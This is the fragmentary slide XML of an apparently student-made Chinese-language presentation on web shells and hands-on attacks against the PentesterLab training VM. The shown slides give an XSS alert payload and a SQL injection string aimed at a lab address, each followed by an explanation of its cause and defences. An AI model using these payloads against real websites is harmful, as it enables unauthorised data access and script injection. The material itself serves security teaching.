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257" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="291" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="277" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="281" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="288" r:id="rId23"/>
    <p:sldId id="265" r:id="rId24"/>
    <p:sldId id="266" r:id="rId25"/>
    <p:sldId id="289" r:id="rId26"/>
    <p:sldId id="290" r:id="rId27"/>
    <p:sldId id="270" r:id="rId28"/>
    <p:sldId id="271" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="293" r:id="rId31"/>
    <p:sldId id="294" r:id="rId32"/>
    <p:sldId id="269" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="296" r:id="rId35"/>
    <p:sldId id="298" r:id="rId36"/>
    <p:sldId id="299" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="300" r:id="rId39"/>
    <p:sldId id="301" r:id="rId40"/>
    <p:sldId id="303" r:id="rId41"/>
    <p:sldId id="305" r:id="rId42"/>
    <p:sldId id="302" r:id="rId43"/>
    <p:sldId id="306" r:id="rId44"/>
    <p:sldId id="307" r:id="rId45"/>
    <p:sldId id="309" r:id="rId46"/>
    <p:sldId id="311" r:id="rId47"/>
    <p:sldId id="308" r:id="rId48"/>
    <p:sldId id="312" r:id="rId49"/>
    <p:sldId id="313" r:id="rId50"/>
    <p:sldId id="315" r:id="rId51"/>
    <p:sldId id="316" r:id="rId52"/>
    <p:sldId id="314" r:id="rId53"/>
    <p:sldId id="317" r:id="rId54"/>
    <p:sldId id="318" r:id="rId55"/>
    <p:sldId id="320" r:id="rId56"/>
    <p:sldId id="321" r:id="rId57"/>
    <p:sldId id="319" r:id="rId58"/>
    <p:sldId id="322" r:id="rId59"/>
    <p:sldId id="323" r:id="rId60"/>
    <p:sldId id="325" r:id="rId61"/>
    <p:sldId id="326" r:id="rId62"/>
    <p:sldId id="324" r:id="rId63"/>
    <p:sldId id="327" r:id="rId64"/>
    <p:sldId id="329" r:id="rId65"/>
    <p:sldId id="331" r:id="rId66"/>
    <p:sldId id="332" r:id="rId67"/>
    <p:sldId id="334" r:id="rId68"/>
    <p:sldId id="336" r:id="rId69"/>
    <p:sldId id="337" r:id="rId70"/>
    <p:sldId id="330" r:id="rId71"/>
    <p:sldId id="333" r:id="rId72"/>
    <p:sldId id="338" r:id="rId73"/>
    <p:sldId id="340" r:id="rId74"/>
    <p:sldId id="341" r:id="rId75"/>
    <p:sldId id="342" r:id="rId76"/>
    <p:sldId id="339" r:id="rId77"/>
    <p:sldId id="343" r:id="rId78"/>
    <p:sldId id="262" r:id="rId79"/>
    <p:sldId id="258" r:id="rId80"/>
    <p:sldId id="292" r:id="rId81"/>
    <p:sldId id="310" r:id="rId82"/>
    <p:sldId id="328" r:id="rId8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64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D939B-421A-40C7-9B3C-E3FF165DD26E}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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16B4A-DE42-4FD1-B4AB-27AD3CF10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026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6B4A-DE42-4FD1-B4AB-27AD3CF1098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11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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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46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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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79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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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7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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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62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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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82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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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22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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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07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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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45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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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99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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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75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4F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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0598-86BC-4FFF-BBA1-7F934520E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93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8394F-3361-45A3-93BD-937618A191B1}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/4/26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20598-86BC-4FFF-BBA1-7F934520E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32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ingarticles.in/web-shells-penetration-testin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f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss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f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss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f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss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onglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injections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honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injection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honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injection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shel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kaiho/p/8276865.htm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cnblogs.com/kaiho/p/8276865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kaiho/p/8276865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blog.csdn.net/weixin_30723433/article/details/9980643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blog.csdn.net/weixin_30723433/article/details/99806436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kaiho/p/8276865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home.com.tw/news/13721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nblogs.com/kaiho/p/8303323.html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www.cnblogs.com/kaiho/p/8303323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kaiho/p/8303323.htm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onglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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onglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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honglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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honglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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ahu0076/article/details/102029021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ahu0076/article/details/102029021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ahu0076/article/details/102029021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blog.csdn.net/ahu0076/article/details/102029021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blog.csdn.net/ahu0076/article/details/10202902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peterhome.idv.tw/index.php/2020/01/02/116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ahu0076/article/details/102029021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://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attack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honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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ingarticles.in/web-shells-penetration-testing/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_shel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ulnhub.com/entry/pentester-lab-web-for-pentester,71/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.peterhome.idv.tw/index.php/2020/01/02/116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Kali_Linux" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.peterhome.idv.tw/index.php/2020/01/02/116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f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/Kali_Linu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nblogs.com/kaiho/p/8276865.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injections" TargetMode="Externa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kaiho/p/8303323.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/weixin_30723433/article/details/9980643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onglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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ahu0076/article/details/102029021" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://laoomiaoo.blogspot.com/2017/05/ldap-null-base-search-acces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tread01.com/content/1550090717.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attack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vulnhub.com/entry/pentester-lab-web-for-pentester,7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9383" y="2492896"/>
            <a:ext cx="7772400" cy="1082551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Shells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實戰測試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984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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報告人：陳柏均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指導老師：偉大的恩師龍大大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548680"/>
            <a:ext cx="44550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108 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學年下學期</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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人工智慧與資訊安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417233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for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Pentester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平台建置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然後開啟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VirtualBox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建立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VM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點選新增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2F30818-CF6C-4981-88FC-5EDB0B02D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768231"/>
            <a:ext cx="7297661" cy="4045145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="箭號: 向下 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32DC9CF-8C81-43EE-A41F-C945E2AC470A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="3694818" y="2422534"/>
            <a:ext cx="484632" cy="9784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682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0A22E24-0186-48EC-A8B9-3B75F2654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489" y="1600200"/>
            <a:ext cx="4198981" cy="429309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for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Pentester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平台建置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名稱：幫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取一個名稱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機器資料夾：指定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檔案要存放在哪裡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類型：選擇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版本：選擇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Other (64bit)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然後點下一步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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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57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9E5F73EC-65EB-4ED7-AFD4-2915E55B8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019" y="1600200"/>
            <a:ext cx="4198981" cy="429309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for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Pentester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平台建置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1024MB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然後點下一步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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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089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C219FFB-67BD-4EDF-B5EC-201A718D1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488" y="1584936"/>
            <a:ext cx="4198982" cy="429309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for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Pentester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平台建置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點下一步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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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946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13E4EE4-CEBA-4F72-A4B8-8F68940B3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430" y="1600200"/>
            <a:ext cx="3918570" cy="433278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for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Pentester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平台建置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點下一步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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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757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8FB1B44-CA9D-42A1-8ECA-CB679AB6F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429" y="1600200"/>
            <a:ext cx="3918571" cy="433278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for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Pentester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平台建置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點下一步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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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647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4F137C4-B4D7-40A6-9049-868985B7B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966" y="1600200"/>
            <a:ext cx="3918572" cy="433278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for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Pentester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平台建置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硬碟：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20GB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點下一步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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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069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C9BFAD7A-3829-453E-9B80-2CC520F71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69" y="2786204"/>
            <a:ext cx="7297661" cy="403005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for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Pentester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平台建置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建立好先不要啟動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點選設定</a:t>
            </a:r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B32DC9CF-8C81-43EE-A41F-C945E2AC470A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="4329683" y="2434546"/>
            <a:ext cx="484632" cy="9784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228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for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Pentester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平台建置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選擇存放裝置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點選光碟機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選擇剛剛下載的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web_for_pentester_i386.iso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檔案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51C1037E-81CA-4BD8-BFA8-950E5C6E73A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="6783663" y="4681194"/>
            <a:ext cx="484632" cy="9784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EC43E9C-3252-42FB-8A91-03BF660A2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1" y="2420888"/>
            <a:ext cx="8914737" cy="4355657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="箭號: 向下 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD35AAE-5FC2-407E-BDF9-7E4EF17D45CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9000000">
            <a:off x="1845750" y="3988672"/>
            <a:ext cx="484632" cy="9784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DAC27F34-F07D-4287-B526-9119608D7CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9000000">
            <a:off x="823698" y="4003618"/>
            <a:ext cx="484632" cy="9784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9FFA6270-AD8E-4AAF-8B32-A88C1F05A3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="6512330" y="2394974"/>
            <a:ext cx="484632" cy="9784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4B54C6E4-B39B-4723-B334-217738A7E681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13500000">
            <a:off x="6359165" y="3774510"/>
            <a:ext cx="484632" cy="9784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355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987D8CE-A47B-4471-9469-F319B5D7E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356" y="2491227"/>
            <a:ext cx="7115288" cy="432381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for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Pentester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平台建置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10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選擇網路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附加到橋接介面卡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點選確定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DAC27F34-F07D-4287-B526-9119608D7CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9000000">
            <a:off x="1684921" y="4681194"/>
            <a:ext cx="484632" cy="9784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9FFA6270-AD8E-4AAF-8B32-A88C1F05A3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="2817467" y="2755622"/>
            <a:ext cx="484632" cy="9784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837E8A0C-AEB8-4A87-B4D6-80A94FF1786B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="6296306" y="5549337"/>
            <a:ext cx="484632" cy="9784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71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Agenda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測試環境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實戰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實戰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實戰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程式分析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參考文獻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2368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CA6285F-FD9D-477E-AF84-B07711CA4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418258"/>
            <a:ext cx="8100392" cy="44733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for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Pentester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平台建置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10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選擇網路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附加到橋接介面卡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點選確定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DAC27F34-F07D-4287-B526-9119608D7CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9000000">
            <a:off x="1684921" y="4681194"/>
            <a:ext cx="484632" cy="9784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9FFA6270-AD8E-4AAF-8B32-A88C1F05A3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="2817467" y="2755622"/>
            <a:ext cx="484632" cy="9784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837E8A0C-AEB8-4A87-B4D6-80A94FF1786B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="6296306" y="5549337"/>
            <a:ext cx="484632" cy="9784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122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A007E526-8E8D-4955-A032-0C20C3105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68" y="2805104"/>
            <a:ext cx="7297662" cy="403005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for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Pentester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平台建置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點選啟動</a:t>
            </a:r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B32DC9CF-8C81-43EE-A41F-C945E2AC470A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="5134979" y="2422534"/>
            <a:ext cx="484632" cy="9784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879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for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Pentester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平台建置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啟動完畢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698C762-2DA4-4223-8FF5-99925CC18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992" y="2139111"/>
            <a:ext cx="6590015" cy="471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43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測試環境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68"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4499992" y="2132856"/>
            <a:ext cx="3896060" cy="1225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 descr="upload.wikimedia.org/wikipedia/commons/thumb/4/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2018956" cy="118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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3347864" y="2774287"/>
            <a:ext cx="1077388" cy="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475656" y="3861048"/>
            <a:ext cx="636591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VirtualBox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建置測試環境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需在同網段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===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virtualbox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使用橋接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4243275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KALI Web Shell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KALI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後，找到等一下要用的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滲透測試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檔案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應該放在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usr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/share/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webshells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/php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601" y="5824359"/>
            <a:ext cx="1684541" cy="98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236808C-8743-4A82-BE56-3F8790BDCE4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="6398696"/>
            <a:ext cx="6102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https://www.hackingarticles.in/web-shells-penetration-testing/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AB62FD0-E8EA-48E0-A088-FE2D61726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00" y="3215634"/>
            <a:ext cx="8794200" cy="233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34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for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Pentester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for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Pentester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位址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這裡是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192.168.43.212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6652198-1F88-4BFF-A86D-539E05B82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" y="2636912"/>
            <a:ext cx="9025986" cy="27321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092633A-0442-43F6-9E9E-7A74981B9668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236654" y="3678926"/>
            <a:ext cx="1687274" cy="2541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214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KALI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for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Pentester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KALI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使用瀏覽器開啟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for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Pentester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平台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25E9126-80F3-483E-B5BD-9D2809D06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2204864"/>
            <a:ext cx="4896544" cy="458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69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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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7362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實戰測試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實戰測試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XSS Exp 1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實戰測試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SQL injections Exp 1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實戰測試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﻿Directory traversal Exp 1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實戰測試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﻿File Include Exp 1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實戰測試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 injection Exp 1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實戰測試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Commands injection Exp 1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實戰測試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LDAP attacks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 1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實戰測試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 Upload Exp 1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實戰測試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 attacks Exp 1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7503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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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XSS Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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006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5F77E52-7310-4398-B2F3-B4E173B0F26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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2807955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D600DA40-C37C-4B2E-BFB5-08E58C1E2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5" y="1600200"/>
            <a:ext cx="2047875" cy="42481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XSS Example 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6717432" cy="45259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進入後可看到網址為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http://192.168.43.212/xss/example1.php?name=hacker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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403232" y="2492896"/>
            <a:ext cx="1512168" cy="3600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A2A9407-07F6-42B2-9D34-66A674209232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91633" y="6371714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http://f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss/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4E554DB-7C34-4661-BED2-CAC03F8C0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32" y="2924944"/>
            <a:ext cx="6926000" cy="338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47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XSS Example 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經由修改網址參數，可將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程式碼注入網頁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http://192.168.43.212/xss/example1.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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&lt;script&gt;alert("Hello hacker");&lt;/script&gt;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A2A9407-07F6-42B2-9D34-66A674209232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91633" y="6371714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http://f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss/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80A4529-7578-471C-A52C-4B48E00F9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86" y="2924944"/>
            <a:ext cx="7783028" cy="344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64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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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XSS Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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0063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XSS Example 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造成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注入的原因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沒有驗證使用者傳送的參數類型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格式將使用者輸入顯示在網頁上，而不是採用純文字格式顯示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防範方式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檢查使用的傳送的參數類型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以純文字顯示在網頁上，比如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將輸出值放在引號內後輸出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A2A9407-07F6-42B2-9D34-66A674209232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91633" y="6371714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http://f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss/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4650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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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實戰測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="6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SQL injections Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="9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6397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E70549A-754B-49F6-B198-FB8FA41AF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8" y="1562256"/>
            <a:ext cx="4210050" cy="42386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SQL injections Example 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70197" y="1631694"/>
            <a:ext cx="4725776" cy="45259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進入後可看到網址為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http://192.168.43.212/sqli/example1.php?name=root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CDFD00-11BA-41BA-85FE-41F7AC385180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429228" y="2454952"/>
            <a:ext cx="1512168" cy="4320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B30F84-1C82-4B35-A534-41BB7E70E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483" y="3520979"/>
            <a:ext cx="7105419" cy="233163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A1F0898-6229-4647-9AF7-9F69E76F17CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
            <a:ext cx="7445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4"/>
              </a:rPr>
              <a:t>http://honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injections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97113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SQL injections Example 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經由修改網址參數，可取得資料庫所有資料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http://192.168.43.212/sqli/example1.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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root' or 'a'='a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E96AF3-B717-45F3-966C-31C1705479B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
            <a:ext cx="7445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http://honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injections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643FF14-978F-49DD-A4EF-A51BE70EA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950477"/>
            <a:ext cx="7222610" cy="342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77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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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SQL injections  Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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9882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SQL injections Example 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造成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注入的原因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沒有驗證使用者傳送的參數格式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直接將使用者參數寫入在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查詢語句內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比如：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"SELECT * FROM `table` WHERE `name` = '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{$_GET['name']}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';”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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會變成：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"SELECT * FROM `table` WHERE `name` = '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root' or 'a'='a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';”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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使得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條件成立，因此取得所有資料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防範方式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檢查使用的傳送的參數格式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使用預載入方式執行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語法，如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Laravel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Equlent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等物件導向套件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010B32-DC89-4B11-845C-18994CDD0B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103555" y="6371713"/>
